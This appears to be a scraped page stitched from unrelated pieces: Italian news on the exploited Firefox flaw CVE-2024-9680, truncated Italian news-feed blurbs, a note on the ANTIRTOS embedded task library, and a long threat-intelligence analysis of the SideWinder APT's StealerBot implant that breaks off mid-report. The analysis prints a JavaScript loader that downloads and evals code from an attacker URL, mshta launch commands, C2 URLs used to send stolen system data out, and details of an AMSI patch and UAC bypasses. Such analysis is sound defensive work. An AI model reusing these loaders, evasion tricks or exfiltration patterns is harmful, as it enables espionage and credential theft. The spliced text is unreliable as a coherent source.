Ricordiamo che il problema è stato scoperto dallo specialista ESET Damien Schaeffer ed era un problema use-after-free nelle timeline di animazione. Le sequenze temporali delle animazioni fanno parte dell’API Web Animations di Firefox e questo meccanismo è responsabile della gestione e della sincronizzazione delle animazioni tra le pagine Web.
Gli sviluppatori hanno rilasciato patch di emergenza e hanno avvertito che, grazie a questa vulnerabilità, un utente malintenzionato potrebbe eseguire codice arbitrario mentre lavora con i contenuti. All’epoca non erano state fornite informazioni dettagliate né sul bug stesso né sugli attacchi in cui è stato utilizzato.
Il problema è stato risolto nelle seguenti versioni del browser: Firefox 131.0.2, Firefox ESR 115.16.1 e Firefox ESR 128.3.1. Come ha affermato Mozilla, gli specialisti di ESET hanno fornito loro un exploit per il CVE-2024-9680, che è stato utilizzato dagli hacker in attacchi reali.
“L’esempio inviatoci da ESET conteneva una catena di exploit completa che consentiva l’esecuzione di codice remoto sul computer dell’utente”, scrivono gli sviluppatori. Mozilla ha riunito un team per decodificare l’exploit e capire come funziona, dopodiché ha preparato una patch di emergenza in un giorno. I rappresentanti dell’organizzazione sottolineano che continueranno ad analizzare l’exploit per sviluppare ulteriori misure di protezione per Firefox.
Quasi contemporaneamente, gli sviluppatori Tor hanno riferito che, secondo Mozilla, questa vulnerabilità è stata utilizzata attivamente negli attacchi contro gli utenti del browser Tor. “Sfruttando questa vulnerabilità, un utente malintenzionato potrebbe prendere il controllo del Tor Browser, ma molto probabilmente non sarebbe in grado di de-anonimizzare l’utente in Tails”, si legge nella dichiarazione.
Tuttavia, il post sul blog del progetto è stato successivamente modificato e il progetto Tor ha chiarito di non avere prove che gli utenti del browser Tor siano stati intenzionalmente presi di mira con CVE-2024-9680. Tuttavia, il bug ha colpito il Tor Browser, che è basato su Firefox, e gli sviluppatori sottolineano che il problema è stato risolto nelle versioni Tor Browser 13.5.7, 13.5.8 (per Android) e 14.0a9.
@Notizie dall'Italia e dal mondo Si tratta di alimenti non deperibili, medicinali e presidi medici, per un valore totale di circa 800.000 Euro. Dal 20 giugno sono fermi a Genova per lentezze burocratiche e restrizioni israeliane sui convogli umanitari L'articolo MUSIC FOR PEACE: “Ci bloccano da mesi
@Politica interna, europea e internazionale Scrivere libri si sta rivelando un’attività particolarmente proficua per Giorgia Meloni. Nel 2023 la presidente del Consiglio ha percepito redditi per 459mila euro, il 56% in più rispetto ai 293mila euro dell’anno precedente. E
Embedded programming is a tricky task that looks straightforward to the uninitiated, but those with a few decades of experience know differently. Getting what you want to work predictably or even fit into the target can be challenging. When you get to a certain level of complexity, breaking code down into multiple tasks can become necessary, and then most of us will reach for a real-time operating system (RTOS), and the real fun begins. [Aleksei Tertychnyi] clearly understands such issues but instead came up with an alternative they call ANTIRTOS.
The idea behind the project is not to use an RTOS at all but to manage tasks deterministically by utilizing multiple queues of function pointers. The work results in an ultra-lightweight task management library targeting embedded platforms, whether Arduino-based or otherwise. It’s pure C++, so it generally doesn’t matter. The emphasis is on rapid interrupt response, which is, we know, critical to a good embedded design. Implemented as a single header file that is less than 350 lines long, it is not hard to understand (provided you know C++ templates!) and easy to extend to add needed features as they arise. A small code base also makes debugging easier. A vital point of the project is the management of delay routines. Instead of a plain delay(), you write a custom version that executes your short execution task queue, so no time is wasted. Of course, you have to plan how the tasks are grouped and scheduled and all the data flow issues, but that’s all the stuff you’d be doing anyway.
@Notizie dall'Italia e dal mondo Lo storico pronunciamento della Corte di Giustizia dell’Unione Europea rappresenta una condanna alla politica di sfruttamento delle risorse ittiche e agricole dei territori del Sahara Occidentale L'articolo Illegittimi gli accordi
[quote]Sin dal 1955 il gargantuesco bombardiere strategico B-52, sviluppato e prodotto dalla Boeing, è stato il simbolo del potere militare americano. Componente fondamentale della triade nucleare, ma anche piattaforma impiegata per lo sgancio tanto di “dumb bombs” quanto
SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was first publicly mentioned by us in 2018. Over the years, the group has launched attacks against high-profile entities in South and Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.
Over the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively described in various analyses and reports published by different researchers and vendors (for example, here, here and here), the latest of which was released at the end of July 2024. The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.
Despite years of observation and study, knowledge of their post-compromise activities remains limited.
During our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities. The attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also discovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed specifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on targets of interest.
SideWinder’s most recent campaign schema
Infection vectors
The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file starts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the StealerBot espionage tool.
The documents often contain information obtained from public websites, which is used to lure the victim into opening the file and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL: nasc.org.np/news/closing-cerem…
Snippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”
The contents of the file are selected specifically for the target and changed depending on the target’s country.
All the documents use the remote template injection technique to download an RTF file that is stored on a remote server controlled by the attacker.
RTF exploit
RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software.
The attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available in the “mshtml.dll” Windows library.
The shellcode uses different tricks to avoid sandboxes and complicate analysis.
It uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size is less than 2GB, it terminates execution.
It uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or AMD, it terminates execution.
It attempts to load the “dotnetlogger32.dll” library. If the file is present on the system, it terminates execution.
The malware uses different strings to load libraries and functions required for execution. These strings are truncated and the missing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip them and jump to valid instructions during execution, to make analysis more difficult.
The strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of an exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the name of the exported function.
The first argument is passed with the standard push instruction, which loads the library address to the stack. The second argument is passed indirectly using a CALL instruction.
Passing necessary arguments
The loaded functions are then used to perform the following actions:
Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.
Get a pointer to the current command line using the “GetCommandLineW” function.
Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the key.
Overwrite the current process command line with the decoded JavaScript.
Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.
The loaded JavaScript downloads and executes additional script code from a remote website. javascript:eval("v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\", \"hxxps://mofa-gov- sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")
Initial infection LNK
During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently uses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.
The archive usually contains an LNK file with the same name as the archive. For example:
ZIP filename
LNK filename
moavineen-e-hujjaj hajj-2024.zip
MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk
NIMA Invitation.zip
NIMA Invitation.doc.lnk
Special Envoy Speech at NCA.zip
Special Envoy Speech at NCA.jpg .lnk
දින සංශෝධන කර ගැනිම.zip (Amending dates)
දින සංශෝධන කර ගැනිම .lnk
offer letter.zip
offer letter.docx.lnk
The LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website controlled by the attacker.
Below are the configuration values extracted from one of these LNK files: Local Base Path : C:\Windows\System32\sshtw.png Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx Relative Path : ..\..\..\Windows\System32\calca.exe Link Target: C:\Windows\System32\mshta.exe Working Directory : C:\Windows\System32 Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0" Icon File Name : %systemroot%\System32\moricons.dll Machine ID : desktop-84bs21b
Downloader module
The RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is stored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.
JavaScript loader (beautified)
App.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an argument by the JavaScript, or to decode and execute another payload passed as an argument.
The library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We named the inputs as follows:
Argument
Argument description
C2_URL
An optional argument that can be used to pass a URL used to download a remote payload.
Payload_filename
An optional argument that can be used together with the “Payload_Data” argument to create a file on the local filesystem that will contain the dropped payload.
Payload_data
An optional argument that can be used to pass an encoded payload that should be dropped on the local filesystem.
App.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions are of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it decodes and decompresses the data using base64 and Gzip. The resulting payload is stored in the user’s Temp directory using the filename specified in the “Payload_filename” argument.
If Avast or AVG solutions are installed, the content of the dropped file is executed with the following command: mshta.exe "javascript:WshShell = new ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1, false);window.close() Otherwise, it will be executed with the following command: pcalua.exe -a %TEMP%\%Payload_filename% If the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The obtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.
The resulting file should be .NET malware named “ModuleInstaller.dll”.
ModuleInstaller
The ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised machines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component since 2020, but previously we only described it in our private intelligence reports.
ModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious library, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules, a malicious library, and an encrypted payload. We observed various combinations of the dropped files, the most common being: %Malware Directory%\vssvc.exe %Malware Directory%\%encryptedfile% %Malware Directory%\vsstrace.dll %Malware Directory%\vssvc.exe.config or %Malware Directory%\WorkFolders.exe %Malware Directory%\%encryptedfile% %Malware Directory%\propsys.dll %Malware Directory%\WorkFolders.exe.config ModuleInstaller embeds the following resources:
Resource name
MD5
Description
Interop_TaskScheduler_x64
95a49406abce52a25f0761f92166c18a
Interop.TaskScheduler.dll for 64-bit systems used to create Windows Scheduled Tasks
Interop_TaskScheduler_x86
dfe750747517747afa2cee76f2a0f8e4
Interop.TaskScheduler.dll for 32-bit systems used to create Windows Scheduled Tasks
manifest
d3136d7151f60ec41a370f4743c2983b
XML manifest dropped as .config file
PeLauncher
22e3a5970ae84c5f68b98f3b19dd980b
.NET program not used in the code
shellcode
32fc462f80b44013caeada725db5a2d1
Shellcode used to load libraries, which exports a function named “Start”
StealerBot_CppInstaller
a107f27e7e9bac7c38e7778d661b78ac
C++ library used to download two malicious libraries and create persistence points
The downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The retrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security solutions:
Pattern
Endpoint Security Solution
q=apn
Unknown
aspers
Kaspersky
Afree
McAfee (misspelled)
avast
Avast
avg
AVG
orton
Norton
360
360 Total Security
avir
Avira
ModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or download the components, but share similarities in the main logic. Some of these routines also include tricks to remove evidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an argument and the value of an internal configuration embedded in the code.
Routine
Conditions
Infection Routine 1
Executed when substring “q=apn” is detected.
Infection Routine 2
Executed when a specific byte of the internal config is equal to “1”.
Infection Routine 3
Executed when the substring “360” is detected.
Infection Routine 4
Executed when the substring “avast” or “avir” is detected.
Infection Routine 5
Executed when the substring “aspers” or “Afree” is detected
Infection Routine 6
Default case. Executed when all the other conditions are not satisfied.
All the routines collect information about the compromised system. Specifically, they collect:
Current username;
Processor names and number of cores;
Physical disk name and size;
The values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;
Current hostname;
Local IP address;
Installed OS;
Architecture.
The collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable named “data”. hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo> The malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet: C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download The malware sends the collected information to one of the C2 servers selected according to the specific infection routine. The server response should be a payload with various configuration values.
The set of values may vary depending on the infection routine. The malware parses the received values and assigns them to local variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular infection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the full list of possible configuration values.
Variable name
Description
MALWARE_DIRECTORY
Directory path where all the malicious files are stored.
LOAD_DLL_URL_X64
URL used to download the malicious library for 64-bit systems.
LOAD_DLL_URL_X86
URL used to download the malicious library for 32-bit systems.
LOAD_DLL_URL
URL used to download the malicious library. Some infection routines do not check the architecture.
APP_DLL_URL
URL used to download the encrypted payload.
HIJACK_EXE_URL
URL used to download the legitimate application used to sideload the malicious library.
RUN_KEY
Name of the Windows Registry value that will be created to maintain persistence.
HIJACK_EXE_NAME
Name of the legitimate application.
LOAD_DLL_NAME
Name of the malicious library.
MOD_LOAD_DLL_URL
URL used to download an unknown library that is saved in the MALWARE_DIRECTORY as “IPHelper.dll”.
The payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.
During execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample used C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the infection status.
Variable
Description
?data=1
Downloads completed.
?data=2
Persistence point created.
?data=3&m=str
Error. It also contains a variable “m” with information about the error.
?data=4
Infection completed, but the next stage is not running.
?data=5
Infection completed and the next stage is running.
The technique used to maintain persistence varies according to the infection routine selected by the malware, but generally relies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.
For example: RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegValue: xcschemer (MALWARE_DIRECTORY) RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)
Backdoor loader module
The infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded using the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped by ModuleInstaller, decrypts it and loads it in memory.
The Backdoor loader module has been observed since 2020, we covered it in our private APT reports. It has remained almost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension.
The library is usually highly obfuscated using the Control Flow Flattening technique. In addition, the strings, method names, and resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover, some relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple DES.
The malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100 seconds. Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in execution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the elapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.
The malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows Antimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the “AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D to always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection to always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.
AmsiScanBuffer before patching
AmsiScanBuffer after patching
The patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as input to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.
After patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another payload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character ‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file as the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method.
StealerBot
StealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module. Prior to being loaded, the binary is stored in an encrypted file.
The implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with the C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded on compromised victims and were used to:
Install additional malware;
Capture screenshots;
Log keystrokes;
Steal passwords from browsers;
Intercept RDP credentials;
Steal files;
Start reverse shell;
Phish Windows credentials;
Escalate privileges bypassing UAC.
Module IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the components. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules with a particular ID.
Module ID
Description
0xca
Keylogger
0xcb
Live Console
0xd0
Screenshot Grabber
0xd4
File Stealer
0xd6
UACBypass
0xe0
RDP Credential Stealer
0xe1
Token Grabber
??
Credential Phisher
StealerBot Orchestrator
The Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server, and executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker and upload files with stolen information. It also exchanges messages with the loaded module that can be used to provide or modify configuration properties and unload specific components from the memory.
Once loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource contains a configuration file with the following structure:
Parameter
Parameter type
Description
Config path
String
Location used to store the configuration file after first execution
Data directory
String
Directory where the plugins store the output files that will be uploaded to the remote C2
C2 Modules
String
URL used to communicate with C2 server and retrieve additional plugins
C2 Gateway
String
URL used to upload files generated by modules
C2 Modules Sleeptime
Integer
Sleep time between communications with “C2 Modules”
C2 Gateway Sleeptime
Integer
Sleep time between communications with “C2 Gateway”
RSA_Key
String
RSA key used to encrypt communication with the C2 server
Number of plugins
Integer
Number of plugins embedded in the configuration
Modules
Array
Array which contains the modules
The configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the malware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2 server.
After parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to communicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2 Modules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2 Gateway”, which is used to upload the data generated by the modules.
The malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an “x” value that contains the list of modules already loaded by the agent. &x[moduleId_1,moduleId_2,moduleId_3,etc.]" The server responds with a message composed of two parts, the header and the payload. Each part has a specific structure with different information:
Message structure
Each message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in the “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the provided digital signature is valid.
The header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is compressed using Gzip and encrypted using AES. The header contains the information needed to identify the module, decrypt the payload, and verify the received data.
When the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a pipe handle. The pipe is used to maintain communication between the module and the Orchestrator.
The modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and terminate module execution. The messages function like commands, have a specific ID, and can include arguments.
The first byte of the message is its ID, which defines the request type:
Message ID
Description
0
Get settings: the Orchestrator creates a copy of the current configuration and sends it to the module.
1
Update config: the module provides a new configuration and the Orchestrator updates the current configuration values and stores them in the local file.
2
Unload current module: the Orchestrator should unload the current module from the memory and close the related pipes.
3
Unload module by ID: the Orchestrator should unload a module with the ID specified in the received request.
4
Remove startup: the Orchestrator should remove a module from the local configuration. The module ID is specified in the received request.
5
Remove current module from the configuration: the Orchestrator should remove the current module ID from the local configuration.
6
Terminate current thread: the Orchestrator stops timers, pipes and removes the current module from the current list of modules.
7
Save log message: the Orchestrator saves a log message using the current module ID.
8
Save log message: the Orchestrator saves a log message using the specified module ID.
9
Get output folder configuration.
10
Get C2 Modules URL: the Orchestrator shares the current C2 Modules URL with the module.
11
Get C2 Gateway URL: the Orchestrator shares the current C2 Gateway URL with the module.
12
Get RSA_Key public key.
Modules
Keylogger
This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard contents, and the title of the currently active window.
Screenshot Grabber
This module periodically grabs screenshots of the primary screen.
File Stealer
The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions. By default, the list of extensions is as follows: .ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf Based on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that usually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the extension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows OS to access remote systems.
The stolen data also includes information about the local drive and file attributes.
Snippet of code with the list of information collected by the File Stealer module
Live Console
This library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. The library can also process custom commands that provide the following capabilities:
Kill the module itself or its child processes;
Download additional files to compromised systems;
Add Windows Defender exclusions;
Infect other users on the local system (requires high privileges);
Download and execute remote HTML applications;
Load arbitrary modules and extend malware capabilities.
Unlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code. By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.
If the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a pseudoconsole to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in “System.Diagnostics”.
Before forwarding the command to the console, the malware checks if the first byte of the received data has a specific value that indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the commands they identify.
Windows build
Command ID
Description
< 17763
3
Kill all child processes
< 17763
4
Kill the current module. Sends the message ID “2” to the Orchestrator to unload the module itself.
< 17763
16
Upload file to the infected system
>= 17763
1
Infect current logged-in user
>= 17763
2
Get current logged-in user
>= 17763
3
Download and execute a remote HTML application
>= 17763
4
Add directories to AV exclusions
>= 17763
5
Load a plugin
Most of the commands are self-explanatory. We’d like to add a few words on the command with ID “1”, which is used to infect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the samples in the target user’s directory and creates a new registry value to ensure persistence.
This command is interesting because in the case of a specific error, the bot replies with the following message: Infected User is already logged in, use install dynx command from stealer bot for installation Currently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of the resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this malware StealerBot.
RDP Credential Stealer
This module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes and injects malicious code into “mstsc.exe” to steal RDP credentials.
mstsc.exe GUI
Mstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware monitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the malware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into the new process memory.
The injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at runtime according to the system architecture, and merged before injection. The injected code is a shellcode that loads another malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the Windows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the following functions:
SspiPrepareForCredRead;
CryptProtectMemory;
CredIsMarshaledCredentialW.
The three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to the main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.
Token Grabber
The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.
Library
Hash
Description
Newtonsoft.Json
52a7a3100310400e4655fb6cf204f024
A popular high-performance JSON framework for .NET
System.Data.SQLite
fcb2bc2caf7456cd9c2ffab633c1aa0b
An ADO.NET provider for SQLite
SQLite_Interop_x64.dll
1b0114d4720af20f225e2fbd653cd296
A library for 64-bit architectures required by System.Data.SQLite to work properly
SQLite_Interop_x86.dll
f72f57aa894f7efbef7574a9e853406d
A library for 32-bit architectures required by System.Data.SQLite to work properly
Credential Phisher
This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.
Phishing prompt
Similar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a targeted process, in this case “explorer.exe”. The shellcode loads a malicious library called “credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing prompt to current users and trick victims into entering their Windows credentials.
When the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to a previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.
UACBypass
This module is a .NET library designed to bypass UAC and run malicious code with high privileges.
The library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. The malware embeds various resources containing different payloads used during malware execution.
Library
Hash
Description
COMUacBypass
7f357621ba88a2a52b8146492364b6e0
Library used to bypass UAC abusing IElevatedFactoryServer COM object
manifest
d3136d7151f60ec41a370f4743c2983b
XML manifest
Module
b0f0c29f4143605d5f958eba664cc295
Malicious library used to download additional malware
ReflectiveDllLoader
f492b2d5431985078b85c78661e20c09
Shellcode to run libraries in memory
VmComputeAgent
ba2914b59c7ae08c346fc5a984dcc219
Program used for Slui UAC bypass technique
VmComputeAgent_exe
d3136d7151f60ec41a370f4743c2983b
XML manifest
Before starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t require admin credentials and that the infected user belongs to the ‘Administrator’ group. If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.
Windows Server or Windows NT 6
%Temp%\%TempFile%
Copy of resource named “Module”
%localappdata%\Microsoft\rundll32.exe
Copy of the legitimate program “%systemroot%\System32\rundll32.exe”
%localappdata%\Microsoft\rundll32.exe.config
Copy of resource named “manifest”
Other Windows versions
%localappdata%\Microsoft\devobj.dll
Copy of resource named “Module”
%localappdata%\Microsoft\rdpclip.exe
Copy of the legitimate program “%systemroot%\System32\rdpclip.exe”
The main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges. The malware tries to use different UAC bypass techniques, which are selected according to the installed security solution. By default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with a technique discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.
If these security solutions are detected, the malware attempts to use a more recent UAC bypass technique discovered in 2022, which abuses the “IElevatedFactoryServer” COM object.
In this case, the malware injects malicious shellcode into “explorer.exe”. The shellcode loads and executes a malicious library that was stored in the resource named “COMUacBypass”. The library uses the “IElevatedFactoryServer” COM object to register a new Windows task with the highest privileges, allowing the attacker to execute the command to run the dropped payload with elevated privileges.
During the static analysis of the “UACBypass” module we noticed the presence of code that is not called or executed. Specifically, we noticed a method named “KasperskyUACBypass” that implements another bypass technique that was probably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a bypass technique that abuses the legitimate Windows program slui.exe. It is used to activate and register the operating system with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique was described in 2020 and is based on the modification of specific Windows registry keys. Based on the created values, we believe the attacker based their code on a proof of concept available on GitHub.
The module still includes two resources that are used exclusively by this code: VmComputeAgent VmComputeAgent_exe The first is a very simple program, packed with ConfuserEx, which starts a new process: “%systemroot%\System32\slui.exe” as administrator.
The second is an XML manifest.
Downloader
The library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs. hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64 hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64 hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr Unfortunately, we were not able to get a valid response from the server, but considering the “name” variable inside the URL and the logic of the various components observed during the investigation, we can infer that each “name” value probably also indicates the real purpose of the file.
Variable
Description
?name=inpl64
implant for 64-bit architectures
?name=stg64
stager for 64-bit architectures
?name=rlfr
reflective loader ???
The downloaded data are combined into a final payload with the following structure: stg64 + <size of rlfr+inpl64+8> + rlfr + <delimiter> + inpl64 Finally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.
On systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies the previously generated payload to the new region, and directly calls the first address.
On newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data” section to the final payload.
The malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution flow to the small shellcode copied in the allocated region.
Finally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.
Snippet of reversed code used to hook LoadLibrary and run the payload
The small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes match, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.
Shellcode embedded in the downloader image
Installers
